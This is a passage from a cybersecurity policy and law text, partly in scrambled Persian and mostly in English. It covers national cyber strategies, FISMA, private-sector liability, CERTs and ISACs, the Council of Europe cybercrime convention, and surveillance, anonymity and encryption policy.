• ﺁﻣﻮﺯﺵ ﻭ ﭘﺮﻭﺭﺵ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺳﺎﺯﻣﺎﻥ ﻫﻤﻜﺎﺭﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺁﺳـﻴﺎ )(APEC ﻣﻲﮔﻮﻳﺪ" :ﺗﻮﺳﻌﺔ ﻣﻨﺎﺑﻊ ﺍﻧـﺴﺎﻧﻲ ﺑـﺮﺍﻱ ﺑـﻪ ﺛﻤـﺮ ﺭﺳـﻴﺪﻥ ﺗﻼﺷﻬﺎ ﺩﺭ ﺟﻬﺖ ﺍﺭﺗﻘﺎﻱ ﺳﻄﺢ ﺍﻣﻨﻴـﺖ ﺍﻣـﺮﻱ ﺿـﺮﻭﺭﻱ ﺍﺳﺖ .ﺑﻤﻨﻈﻮﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ،ﺩﻭﻟﺘﻬـﺎ ﻭ ﺷﺮﻛﺘﻬﺎﻱ ﻫﻤﻜﺎﺭ ﺁﻧﻬﺎ ﺑﺎﻳـﺪ ﻛﺎﺭﻛﻨـﺎﻥ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﻣـﻮﺭﺩ ﻣﻮﺿــﻮﻋﺎﺕ ﭘﻴﭽﻴــﺪﺓ ﻓﻨــﻲ ﻭ ﻗــﺎﻧﻮﻧﻲ ﺑــﺎ ﭘــﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ APEC Cybersecurity Strategy, http://www.apecsec.org.sg/content/apec/apec _groups/working_groups/telecommunications _and_information.html Council of European Union, Council Resolution of 28 January 2002 on a common approach & specific actions in the area of network & information security, (2002/C 43/02), http://www.europa.eu.int/information_society/e europe/action_plan/safe/netsecres_en.pdf ۵۱ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻫﻢ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻭ ﻫﻢ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺍﺳﺖ ،ﺍﻣﺎ ﭼﻨـﻴﻦ ﻣـﻲﮔﻮﻳـﺪ ﻛـﻪ ﺩﻭﻟﺖ ﻧﺒﺎﻳﺪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺗﺤﻤﻴـﻞ ﻛﻨﺪ .ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﻣﻨﺒﻊ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ: The National Strategy to Secure Cyberspace [U.S.], February 2003, pp. 11, 15 http://www.whitehouse.gov/pcipb http://www.dhs.gov/interweb/assetlibrary/Natio nal_Cyberspace_Strategy.pdf 50 ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴـﺎﺗﻲ ﻭ ﺟـﺮﺍﺋﻢ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺁﻣـﻮﺯﺵ ﺩﻫﻨﺪ". ٥٢ • ﺍﻫﻤﻴﺖ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺷﺒﻜﻪﻫﺎﻱ ICTﺩﺍﺩﻩﻫـﺎﻱ ﺑـﺴﻴﺎﺭ ﺣـﺴﺎﺱ ﺷﺨـﺼﻲ ﺭﺍ ﺍﻧﺘﻘﺎﻝ ﻣﻲ ﺩﻫﻨﺪ ﻭ ﺫﺧﻴﺮﻩ ﻣﻲﺳﺎﺯﻧﺪ .ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺟﺰﺀ ﺿﺮﻭﺭﻱ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﻓﻀﺎﻱ ﺳـﺎﻳﺒﺮ ﺍﺳـﺖ ﻭ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺑﺎﻳﺪ ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﺳﺎﺯﮔﺎﺭ ﺑﺎ ﺍﺭﺯﺷﻬﺎﻱ ٥٣ ﻣﻬﻢ ﺟﺎﻣﻌﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺷﻮﺩ. 
• Vulnerability assessment, warning and response
As the APEC strategy stated: "Effectively combating cyberspace offences and protecting infrastructure information depends on economies having systems for assessing threats and vulnerabilities and issuing the necessary warnings. By identifying and sharing information about a threat before it causes widespread damage, networks are better protected."[54] The United States strategy had called on all stakeholders to take part in creating a system that responds to cybersecurity at the national level, so that attacks on computer networks are identified quickly.

• International cooperation
To make it easier to exchange views and cooperate on spreading a "culture of security" between government and the private sector at the international level, governments must cooperate with one another to enact compatible laws on cyberspace crime, and the law-enforcement forces of different countries must help one another through international organizations.[55]

[52] Respect for Privacy
[53] OECD Guidelines for the Security of Information Systems and Networks: Towards a Culture of Security, July 25, 2002, http://www.oecd.org/pdf/M00034000/M00034000.pdf. For more information, see the Internet addresses in footnote 48.
[54] APEC Cybersecurity Strategy, http://www.apecsec.org.sg/content/apec/apec_groups/working_groups/telecommunications_and_information.html

The process of developing and implementing cybersecurity strategies for government has elements in common with developing and implementing a cybersecurity program in other organizations and legal entities:

• Assessing vulnerabilities;
• Raising the level of awareness;
• Appointing one person as a leader to coordinate policies;
• Developing a risk management[56] program;
• Adopting appropriate security guidelines;
• Structural justification; and
• Periodic reassessment and continuous improvement.
Phase four (focusing on government security systems) is the announcement of guidelines and the enactment of the laws needed for cybersecurity. Some countries, such as Japan and Italy, have addressed this issue through such guidelines. In July 2000 Japan's cabinet-level committee for the promotion of IT security adopted guidelines on IT security policy in which all departments and ministries were asked to carry out an assessment of their IT security policies by February 2003 and to take further steps to raise the level of security. In March 2001 the Ministerial Council for Promoting the Digitization of Public Administration[57] issued security guidelines for all government IT stakeholders.[58] In 2002, when the United States Congress concluded that the executive branch had not sufficiently raised the security level of government computer systems, it issued the Federal Information Security Management Act (FISMA)[59] to clarify the requirements and working methods in government.[60] The same happened in Tunisia, where in 2002 the government passed and promulgated security laws under which government organizations were obliged to undergo an annual security audit.[61]

Implementing a cybersecurity strategy in government systems - the United States approach

In the United States, the security policy for government information systems has been specified in greater detail and implemented through the Information Security Management Act (enacted in 2002).[62] This law illustrates some ways of implementing cybersecurity policy that bring about "accountability" in different organizations.

The specific aim of FISMA is the management of computer security across government. It causes all the efforts made to secure information to be coordinated with one another, and it provides a mechanism for developing and maintaining the minimum controls needed to protect government information systems. The law acknowledges that commercial products provide effective and dynamic solutions for government, and it leaves the selection of specific hardware and software security solutions to the specialized agencies.

FISMA says that the head of each agency must develop, document and implement an information security program within his or her agency that covers the agency's operations, including those managed by contractors.[63] This program must include the following:

• Periodic assessment of risks and of the magnitude of the harm to information that could result from causes such as unauthorized access[64] (use, disclosure, disruption, modification, or deletion);
• Developing policies and procedures that:
  o are based on the risk assessment process;
  o lead to a reduction in the costs of security risks;
  o ensure that information security is fully taken into account throughout the life cycle of each agency's information system; and
  o ensure that the security requirements and standards of the Office of Management and Budget[65] (OMB, part of the Executive Office of the President) are met;
• Preparing subordinate plans for providing an adequate level of information security for networks, facilities, and systems or groups of information systems;
• Holding training courses to raise the security awareness of agency staff, contractors and other users of information systems who work in the agency;
• Periodic testing and evaluation of the effectiveness of information security policies, procedures and practices, including testing of management, operational and technical controls;
• A process for planning, implementing, evaluating and documenting the actions needed to remedy deficiencies in the agency's information security policies, procedures and practices;
• Procedures for detecting, reporting and responding to security incidents; and
• Plans and procedures to ensure continuity of operations of the agency's information systems.

Each agency must submit an annual report to the representative of the Office of Management and Budget and to congressional committees on the adequacy and effectiveness of its information security policies, procedures and practices, and on the extent to which they comply with the required elements of the information security program. In addition, the adequacy and effectiveness of information security policies, procedures and practices must also be addressed in a number of other plans and reports, including those relating to the agency's annual budget, financial management, internal audit and management controls. If any deficiency is found in policies, procedures and practices, it must be reported to the Office of Management and Budget and to Congress.

Every year agencies must provide an independent security evaluation to determine the effectiveness of their information security program and practices. Each evaluation has two parts: the first is an examination of the effectiveness of the information security policies, procedures and practices of a subset of the agency's information systems; the second is an assessment of the related information security policies, procedures, standards and guidelines.[66]

To ensure that all information security policies and best practices are implemented, FISMA requires the representative of the Office of Management and Budget to oversee the development and implementation of all information security policies and practices. FISMA also delegates the authority needed to develop information security standards, guidelines and minimum requirements[67] to the National Institute of Science and Technology, and it requires the representative of the Office of Management and Budget to manage the fulfilment of these requirements and to review and revise the agency's information security programs at least once a year. The representative of the Office of Management and Budget is responsible for submitting an annual report on the agency's performance to Congress.[68]

[55] Meeting of G8 Ministers of Justice & Home Affairs, Paris, May 5, 2003, http://www.g8.utoronto.ca/justice/justice030505.htm
[56] Risk Management
[57] Ministerial Council for Promoting the Digitization of Public Administration
[58] http://www.kantei.go.jp/foreign/it/network/priority-all/7.html
[59] Federal Information Security Management Act
[60] Federal Information Security Management Act, Title III of E-Government Act of 2002, Pub. Law 107-347, http://csrc.nist.gov/policies/FISMA-final.pdf
[61] Auditing
[62] See the previous footnote, and also: http://www.fedcirc.gov/library/legislations/FISMA.html
[63] Title 44, United States Code, section 3544
[64] Unauthorized Access
[65] Office of Management and Budget
[66] Title 44, United States Code, section 3545
[67] Title 40, United States Code, section 11331
[68] Title 44, United States Code, section 3543

Chapter Three
The role of law and government policy with regard to the private sector

Organizations have a strong incentive to protect the security of their information systems, because their interests depend on it. If a company does not protect itself against the problems of cyberspace, the resulting losses directly threaten its interests. Security breaches in cyberspace can halt a company's business activity and damage its reputation. An attack on a company's computer network may stop its operations and cause customer data or trade secrets to be damaged or destroyed. Any company that has not given security the necessary attention may lose all of its customers to competitors that do pay sufficient attention to security. If makers of computers and software produce insecure products, they may quickly lose their customers.

Transferring traditional legal responsibilities to the realm of cyberspace

In addition to the pressure the market puts on producers to deliver security, laws can also be a motivating factor. Companies face a set of responsibilities arising from traditional concepts such as corporate law, contract law and liability law (for compensating intentional and unintentional damage). They also face newer laws, such as those on the secure registration and sale of securities on public exchanges and on the prevention of deceptive and unfair trade practices. How these traditional legal responsibilities apply to cybersecurity issues has attracted a great deal of attention and effort. At present, law-making bodies are trying, by enacting general laws or by issuing case-specific circulars and regulations, to apply the regulated systems of traditional commerce to computer security as well. In countries whose judicial system allows judges to interpret general legal concepts in the light of new circumstances, judges can help resolve the legal issues and problems of electronic security that require decisions about traditional legal concepts (such as negligence or failure to perform the duties assigned in a contract) and about computer vulnerabilities.

Although such rules are rarely found even in the laws of developed countries, part of the policy-making and law-drafting effort of every country, developed or developing, should be devoted to electronic security issues (such as how traditional legal concepts are used in matters like threats and responsibilities in the field of computer security). In this part we discuss ways in which general policies and laws are extended so that they can also be applied to computer security. Chapter Four also discusses government policies designed solely to promote electronic security in the private sector.

Laws relating to corporate governance, accounting, and the registration and sale of securities

Under corporate law, directors and officers may undertake toward the organization and its shareholders to provide an accurate forecast of the organization's business operations. It is increasingly becoming established that this forecasting also covers matters such as computer security. Some experts have noted that if directors fail to take appropriate steps to assess security threats, they will be liable to the company's shareholders in the event of loss.

In the United States, duties of this kind, which arise from general corporate law, have been reinforced by the enactment of criminal laws. The Sarbanes-Oxley Act (enacted in 2002) imposed several new requirements on companies and drew widespread attention with the disclosure of large-scale security scandals. Congress determined that electronic security is necessary for evaluating companies' financial data. Congress also made the assessment of companies with respect to the security of their information systems mandatory. In addition, under general corporate law, publicly traded organizations must undergo financial audits by independent auditors. If auditors find that electronic vulnerabilities threaten the company's financial records, they add electronic security indicators to the scope of their audit. A number of relevant organizations have created standards and guidelines for auditors to use.
Contract law

Under contract law, organizations must bear responsibility for unauthorized access to customer data, or damage to it, resulting from electronic security deficiencies. Under this law, a company that states in electronic texts that it "has a secure system" is deemed to have entered into a two-way agreement with its customer under which it is obliged to interact with customers in a secure environment. In such a case, if the security of the customer's information is compromised by electronic attacks, the customer can claim breach of obligations. Likewise, companies that provide web-based services may, under contract, assume responsibility for the availability of their services. In this case too, if the website is prevented from operating and providing service as a result of denial-of-service[69] attacks, the company will be exposed to claims of breach of obligations by its customers.

Tort law

From a legal standpoint, the concept of tort (civil liability for inadvertent damage) applies to various kinds of computer security harm. For example, applying traditional tort law to computer offences, if a company does not take reasonable measures to protect customer information against electronic attacks, it may face claims of breach of obligations from its customers. When a company's computers are used to carry out electronic attacks on a third party, the intermediate company may be held at fault if effective measures were not taken to prevent the computer theft. When an attack is carried out by one of a company's employees, the victims may, by proving this, accuse the company of disregarding the necessary hiring or supervisory rules and standards.

[69] Denial of Service
At present, even in the United States - where tort laws exist in many cases - laws of this kind have not been much developed, and so far the courts have not declared attention to network security to be a legal duty. Nevertheless, perhaps only the passage of time can make the old theories of liability applicable in the field of computer security. At that time the courts can derive computer security standards from the best practices of legislators and the business community, and the standards can also be revised by self-regulatory organizations.

Chapter Four
Government cybersecurity policies

Governments have gradually realized that they must adopt policies that specifically address the cybersecurity of the private sector. This may also include adapting other private-sector laws to fit computer security issues. Experience has shown that a key condition for successful legislation is to limit laws to specific circumstances and situations. With this in mind, governments have defined the private sector's duties without specific regard to technology or standards. In Europe, the Data Protection Directive[70] places responsibility for computer security on all sectors, and the government of Singapore has made computer security a fixed part of the requirements for the financial sector. In recent years, United States government laws have clearly defined computer security responsibilities in the banking industry and the healthcare industry. These are described in detail below, but first we turn to some important roles of government toward the private sector, all of which are other than legislation.

Non-legislative roles of government

There are various ways of applying government policy to the security of private-sector computer systems. These policies are not all legislative; many of them, which may even have greater effect, can be non-legislative policies.

Research - One of the government's important roles is funding and carrying out research on computer security. The United States National Institute of Standards and Technology (NIST)[71] is a non-legislative government organization within the United States Department of Commerce. NIST's mission is to develop and promote measurement, standards and technology in order to increase productivity, facilitate trade and improve the quality of life.

NIST's computer security division undertakes the following activities to improve the security of an information system:

• Raising awareness of information technology risks, vulnerabilities and protection requirements;
• Researching, studying and advising organizations that are exposed to information technology vulnerabilities;
• Devising mechanisms for establishing security in sensitive government systems;
• Developing standards, metrics, tests and validation programs to promote, measure and evaluate security in systems and services;
• Providing minimum security requirements for government systems;
• Providing guidance for securing the planning, implementation, management and operation of information technology;

In publishing research results, government organizations must somehow overcome their inclination toward secrecy. A good example is the top-secret national security organization in the United States, which has placed its security recommendations on the organization's public website for everyone to access.

Standards - The government is also one of the important decision-makers in setting private-sector standards. Standardization is a non-legislative, voluntary and consensus-based process, but government experts can also take part in it - especially if the government supports public-sector computer security research.

Awareness, education and capacity building: Another of the government's non-legislative roles is public education and cooperation with the private sector to raise awareness of vulnerabilities and of methods of prevention. Case studies and reports such as those described earlier are among the tools for achieving this aim. The European Commission has asked its members to draw up a public education and awareness program that covers the whole range of audiences. Presenting the reports and strategies mentioned above to professional communities is effective in raising awareness. Education also includes scholarships, development programs and raising the level of knowledge of human resources. The European Commission has recommended that member states put more of the focus of courses on computer security.

[70] Data Protection Directive
[71] National Institute of Standards and Technology
Information sharing - Another important role of government is sharing information about computer security vulnerabilities, warning of new viruses and attacks, and offering suggestions for solving problems, security patches[72] and best practices. The government can fund information exchange centers such as the Computer Emergency Response Team (CERT)[73] and the cooperation centers that have been set up around the world. For example, the United States CERT at Carnegie Mellon University is a government research and development center that works to provide assistance in handling computer security incidents, publish security alerts, research long-term changes in networked systems, and provide training in how to prepare information security plans. Other countries in which a CERT exists include Malaysia, Japan, Australia and Korea. Mcert is a computer security emergency response center for small and medium-sized companies in Germany; it establishes cooperation between the private and public sectors through Germany's BITKOM ICT association, seven industrial sponsors and the government of that country.

Multinational structures are gradually emerging for better exchange of information at the regional and cross-regional level. In June 2001 the European Commission issued a convention on strengthening CERT in Europe and on better participation by its executive members. In February 2003 the Commission went a step further and announced its decision to create a Network and Information Security Agency.[74] APEC took the lead in setting up local CERTs, in domestic training within countries and in developing the capabilities of this center in the developing countries of the region, and it drew up CERT guidelines. The G8 also created a network of permanent points of contact to facilitate cooperation and information exchange in the field of cybercrime, and at present governments that are not members of the G8 can also take part in it.

[72] Security Patches
[73] Computer Emergency Response Team
[74] Network And Information Security Agency
In the same way, governments around the world may, in various forms, establish institutions in the private sector that set up voluntary information sharing systems, such as Information Sharing and Analysis Centers (ISACs).[75] For example, the United States has established ISACs for specific sectors of industry (such as financial services, telephone communications and the electric power industry), and countries such as Canada, Germany, Japan and the Netherlands also have ISACs. The United Kingdom is pursuing the concept of WARP[76] (warning, advice and reporting points) - a nationwide network for better and faster preparation of advice and warnings about electronic attacks, and for more complete receipt of incident reports in that country.

The government can also create private and public committees for better exchange of security information. One example is the National Security Telecommunications Advisory Committee (NSTAC),[77] which consists of thirty important representatives of the communications industry, network service providers, information technology companies, and officials responsible for national security and emergency communications systems. NSTAC is also the President's industry adviser on problems relating to national security and emergency preparedness in communications policy.

Criminal law

Another way in which the government can support private-sector systems is "criminal law". International and regional institutions have proposed that each country, as part of the legal framework for improving trust and security in cyberspace, should adapt its laws to deal with offences that undermine the confidentiality, integrity or availability of data. The operative framework of criminal law consists of substantive law[78] and procedural law,[79] which derives from privacy concepts that have specific application in cyberspace and also from field investigations.

The United Nations is perhaps one of the first international organizations to have pointed to the importance of cybercrime. In December 2000 and January 2002 the UN General Assembly adopted resolutions 55/63 and 56/121 on combating the criminal misuse of communication technologies. Resolution 55/63 states that countries should draw up special laws to eliminate safe havens for those who commit cybercrime. In addition, resolution 55/63 states that the government should take the necessary measures to prevent the criminal misuse of information technology (with international cooperation to prevent the exchange of electronic data). Resolution 55/63 also proposes training on enforcement laws concerning cybercrime.

Violations of substantive criminal law

Various methods of committing cybercrime are conceivable, and there are different names for different violations, but on the whole, laws on cybercrime fall into one of the following four categories:

• Data interception:[80] intentional and unauthorized copying of private computer data. One example is copying individuals' e-mail messages. These laws are intended to protect the confidentiality of communications. It may be noted here that most of the world's legal systems treat unauthorized interception of telephone conversations as a crime, and this well-defined concept from the world of telephone communications can serve a similar function in cyberspace.
• Data interference:[81] intentional and unauthorized damaging, deletion or alteration of data on another person's computer. For example, sending viruses that delete files, or that break into a computer and cause data to be altered, or that break into a website and change its appearance, all fall into this category. Identifying the element of "intent" is vital for distinguishing criminal activity from mere ordinary mistakes or the accidental sending of viruses.
• System interference:[82] intentional and unauthorized hindering of the operation of a computer system by inputting, transmitting, damaging, deleting or altering computer data. This category covers things such as denial-of-service attacks or introducing a virus into a system in a way that interferes with its normal operation. "Serious harm" is the element that separates criminal activity from ordinary Internet behaviour such as sending one or several unsolicited e-mail messages.
• Illegal access:[83] intentional and unauthorized access to another person's computer system, which in the electronic realm can be regarded as the equivalent of "trespass". (From another perspective, illegal access compromises the confidentiality of stored data and is therefore a threat to data confidentiality.) In some legal systems the definition of illegal access is limited to situations in which confidential information (such as medical or financial information) is obtained, copied or viewed.

The Council of Europe has published a convention containing points of this kind. Articles 2 to 5 of the Council of Europe Convention on Cybercrime name four items as the core cybercrimes. These items are, however, explained in detail in the Convention itself and can cover a variety of activities. The Convention has an explanatory report that helps with its interpretation. Article 2 of the Convention calls on governments to act against computer crime (intentional and unauthorized access to the whole or any part of a computer system). On its face, this article treats people who send unsolicited e-mail as offenders, because the sender has gained access to the recipient's computer (or the recipient's mail servers) without permission. On the basis of this interpretation, the Council of Europe Convention on Cybercrime makes clear that what is meant by "without permission" relates to the ordinary, inherent activities of the Internet that happen in it every day, such as sending e-mail, accessing web pages directly or through hypertext[84] links, and using cookies or bots to collect information.

[75] Information Sharing and Analysis Center
[76] Warning, Advice & Reporting Point
[77] National Security Telecommunication Advisory Committee
[78] Substantive Law
[79] Procedural Law
[80] Data Interception
[81] Data Interference
[82] System Interference
[83] Illegal Access
Computer-facilitated crimes

Computer crime includes not only the activities an offender carries out against computers but also crimes that are facilitated by the use of a computer. For example, theft and fraud are crimes that are dealt with in every legal system in the world outside the Internet. But theft and fraud also take place in the world of the Internet. Likewise, offences such as literary and intellectual theft or the distribution of obscene images of children are not limited to computer crime; rather, they are offences that are facilitated by the use of a computer. In many cases the penalties for existing crimes are also applied to Internet crimes. A careful analysis of the various elements of such crimes requires a comparative examination of the existing criminal laws in the field of cyberspace crime, and in this regard it is also necessary to distinguish between computer offences and crimes that are facilitated by computer.

Articles 7 to 10 of the Council of Europe Convention move away from this concept and deal more generally with crimes in which a computer is used to facilitate something that is also considered a crime outside the Internet (acts such as forgery, fraud, distributing, producing or possessing obscene images of children, and infringing the rights of the creator of a work). In some legal systems, applying special rules to crimes facilitated by computer may be unnecessary. These laws may also, by providing for penalties that are not very proportionate, make crimes committed in cyberspace appear worse than similar crimes in the real world.

[84] Hypertext

Applying basic concepts of criminal law

Countries may wish to take common criminal law concepts such as "aiding and abetting" or "intent" into account in the field of cybercrime as well. Thus, if ordinary criminal law has defined the concept of "intent to offend", the same concept can be applied to cybercrime.
For example, sending a virus with the intention of causing a denial of service may be treated as a "crime" or as "intent to commit a crime", even if the virus does not work properly. Similarly, if the law has defined the concept of "aiding and abetting", the same definitions can be used in the field of cybercrime, so that, for example, if someone deliberately creates a virus, then even if the virus was released onto the network by another person, the creator is still held responsible for the damage the virus causes to data and to the network.

Protecting privacy

Attention to cybercrime often gives rise to questions, such as: what are the rules under which the government obtains the right of access to electronic communications and computer data - data that may be evidence of cybercrime and of other kinds of offences? Many countries have legal procedures that allow the government to examine information stored in computers. These procedures may be judicial orders to examine stored data, or warrants for the seizure and search of computers and computer data. Many countries also permit real-time interception[85] of communications and of transmission data, which indicates the origin and destination of communications. An important part of the Council of Europe Convention on Cybercrime obliges governments to use special laws for investigating and tracing computer records, intercepting communications, and reporting any kind of computer record to the government.

[85] Realtime Interception
Under UN resolution 55/63 (December 2000), just as countries pass laws for conducting investigations into communications and computer data, they must also protect individual freedoms and privacy. In 1990 the Eighth United Nations Congress on the Prevention of Crime and the Treatment of Offenders put forward proposals on the use of assessment methods, clear laws and international cooperation in identifying cybercrime. In 1995 the United Nations published the manual on the prevention and control of computer-related crime. This detailed document covered a wide range of topics related to technology crime, including procedural law, substantive law, international cooperation, data protection, security, and privacy.

Compelled reporting of data stored in computers, and government interception of communications and transmission data, infringe individuals' privacy, and as a result the need for protective procedures is felt more than ever. As the OECD states in its guidelines on the security of networks and information systems: "Security measures should be implemented in a manner consistent with the values recognized by democratic societies, including the freedom to exchange thoughts and ideas, the free flow of information, the confidentiality of information and communications, the appropriate protection of personal information, and transparency." The European Commission states that the protection of privacy is a core policy of the European Union and that this is also laid down in Article 8 of the European Convention on Human Rights. Likewise, Articles 7 and 8 of the Charter of Fundamental Rights of the European Union[86] set out respect for the rights of family and private life, communications and personal data. In developing and transitional societies, unlimited surveillance by governments can completely destroy the notion of trust in the world of the Internet.

In this regard, the Council of Europe Convention states explicitly that surveillance of communications and examination of stored data are permitted only to the extent that they do not violate privacy as defined in the European human rights charter. Article 15 of the Convention on Cybercrime contains the following points:

1. Each organization must ensure that due attention has been paid to the establishment, implementation and application of these procedures within the local rules and laws - which have been drawn up to provide adequate protection of human rights and liberties, including the rights set out in the 1950 Council of Europe Convention for the Protection of Human Rights and Fundamental Freedoms and in other international human rights instruments.
2. These rules must, to the extent that their nature requires, include judicial and other independent supervision, regulate applications, and provide for the reduction of the scope and time limitations of the procedures.

Surveillance standards

The Council of Europe Convention does not specify particular surveillance procedures tied to the European human rights charter; rather, in the decisions of the European Court of Human Rights (summarized below), the surveillance laws of countries such as Canada and the United States - which have strong, independent procedures for adjudication and for protecting privacy - can be seen. In developing and transitional societies, which lack clear and well-defined laws on search, seizure and surveillance even for the world outside the Internet, serious attention needs to be paid in the electronic field to developing strong standards under government oversight.

In many of the world's advanced legal systems, interception of electronic communications is permitted, but under clear legal standards; and even then sufficient grounds are required, which in legal systems usually means approval by a judge.

Governments that deal with interception and data access issues must pay attention to the operational standards for government access to communications and computer data. International experience is a useful guide on this subject. Based on national and international standards, the following approaches can make lawful interception of communications possible:

• Interception standards should be transparent and the laws publicly available, and they should inform citizens fully, clearly and with the necessary precision of how and under what conditions surveillance takes place;
• Approval of interception should be given in writing by an independent authority (preferably a judge) and should be based on a written request and the presentation of valid and acceptable reasons and evidence;
• Surveillance should be limited solely to the investigation of serious and specific matters;
• Approval should be given only where there are strong grounds indicating the need to investigate offences;
• Approval of interception should be given only in cases where the use of other techniques is not sufficient to obtain the information;
• The persons and matters to be placed under surveillance should be specified in full detail, and generalities should in no way be acceptable;
• The rules should be technology-neutral (all communications, whether telephone, video or data, over wired or wireless lines, digital or analogue, should be treated in the same way);
• The scope and duration of surveillance should be limited and should in no case be longer than the time needed to obtain the information sought;
• Surveillance should be carried out in a way that results in the least possible violation of privacy;
• The laws should set out the use of information obtained from interception, and that information should not be used for other purposes;
• The law should specify the procedures for issuing a ruling concerning the accused;
• The law should determine whether or not all persons placed under investigation - regardless of the outcome - must be informed of the investigation after it has ended; and
• If, under the standards, a person's privacy is violated in the course of an interception operation, compensation for all the damage caused should be mandatory by law.

[86] Charter of Fundamental Rights of the EU
Many of these also apply in the course of an investigation and when law enforcement agents seize computer data.

Data Retention and Other Government Mandates

A number of developed countries (including the United States) have imposed specific rules on ordinary telephone service, and in some countries Internet service providers (ISPs) must place all communications networks under government surveillance. In addition, some countries are moving to adopt laws under which service providers are required to keep traffic data for all communications for a minimum period (a rule known as "data retention"). These rules are highly controversial and have been criticized for threatening citizens' privacy and the security of networks and for imposing considerable costs on service providers. A fuller examination of surveillance rules is beyond the scope of this book. It is worth noting, however, that the Council of Europe Convention on Cybercrime does not impose technical standards or data retention requirements on service providers. The Convention only provides procedures for preserving, accessing or obtaining commercial data, and relies on the technology that companies already have. This does not require any change to technology or business practices. In 2002 the European Union issued a directive on privacy in the communications sector that allowed member states to use data retention measures but did not oblige them to do so.

Anonymity

The Council of Europe Convention on Cybercrime has set out another important privacy right: the right to communicate anonymously. The Convention's explanatory report makes clear that it does not expect service providers to keep and register the names of their subscribers. Under the Convention, therefore, service providers are not obliged to record identity information, to verify the identity of subscribers, or to resist the use of pseudonyms by users. In 2003 the Council of Europe published a declaration on freedom of communication on the Internet to this effect: "In order to enhance the free dissemination of information and ideas, member states should respect the users' ideas and not their identity". In addition, in 2001 the European Commission recognized anonymous activity and, in a communication on how to create a safer information society, stated: "Many kinds of authentication mechanisms are needed for our different needs in the environments in which we interact. In some environments it may be necessary or preferable to remain anonymous". In its 2001 study on network and computer security, the European Commission stated that authentication on the network must also allow for anonymity, just as in many services there is no need for the user's identity to be known.

Encryption

Encryption is a useful tool for maintaining security on the Internet. As the European Commission noted in 2001: "The use of encryption technologies is essential, particularly with the growth of wireless communications". In view of this, the general direction of national encryption policy should be to remove or reduce laws that restrict the use of encryption. In recent years, developed countries that had previously sought to control encryption have concluded that, on the whole, encryption increases security. The encryption policy in the OECD's 1997 guidelines and in the European Commission's 1998 report strongly supports unrestricted access to encryption products and services.

In the late 1990s Canada, Germany, Ireland and Finland drew up national cryptography policies based on the OECD guidelines, in order to support the free use of encryption. France, which had a long history of restricting encryption, reversed that policy completely in January 1999 and announced that encryption could be used without restriction. In December 1997 Belgium amended its 1994 law restricting encryption. The United States, which had restricted encryption by limiting trade in encryption products and services, lifted all restrictions on these products in 2000.

Law and Regulation

In many countries policymakers have concluded that market pressure alone is not enough to reduce electronic security threats effectively and, as the European Commission has pointed out, that government intervention is also necessary, because the market does not create sufficient incentive to pay the necessary attention to security: market prices do not always accurately reflect the costs and benefits of investing in security; and usually neither producers nor consumers can bear all the consequences of the breakdown that results from neglecting security measures; moreover, control over the Internet is dispersed and, given the complexity of networks, it is difficult for users to assess potential risks. Many critical infrastructures that depend heavily on computer systems have a long history of regulation, such as rules on safety, competition and environmental impact. Today, legislators increasingly include cyber security in the list of matters that governments must attend to.

Regulation nevertheless carries risks. In some respects the Internet is known as a communications medium that is almost unregulated. In general, the global trend in the latter part of the past decade was toward deregulation of communications networks. Competition and innovation support the development of new services and technologies, reduce the resources required and increase access to communications technology. When technology is changing rapidly, government regulation becomes an obstacle to the deployment of innovative security solutions.

This raises the fundamental question of what the best way to raise the level of security is. In general, as a basic principle, government should not impose technology rules on the operators of private-sector critical infrastructure. Many people believe that technology-specific directives and rules are ineffective and sometimes even harmful.

Instead, one approach is to impose general security requirements. This approach, which arose from the concept of privacy protection, became mandatory in all sectors that collected and processed personal data. Another approach is to focus on specific sectors of the economy. For example, in the rules the United States has established for privacy in the health care and financial services sectors, it has also included requirements to protect the security of personal data. Singapore has also focused on financial services, but not from the standpoint of privacy protection: Singapore's electronic security guidelines for financial services institutions address security concerns directly rather than threats to privacy. There are also different ways of turning general security requirements into step-by-step security measures. One approach for government electronic security regulation is to emphasize processes rather than technologies. Another approach is to prepare guidelines. These approaches can complement one another.
Europe has begun to apply new security rules in all sectors that collect and process personal information. Article 17 of the European Union's Data Protection Directive requires holders of personal data to apply appropriate technical and organizational measures to protect that data against destruction, alteration, disclosure or unlawful access (particularly where the processing involves transmitting data between networks). The Directive also states that "such measures must provide an appropriate level of security against the risks inherent in the processing of the data". Canada has taken a similar approach. There, under the Personal Information Protection and Electronic Documents Act, private-sector companies are obliged to put specific security safeguards in place to protect personal information.

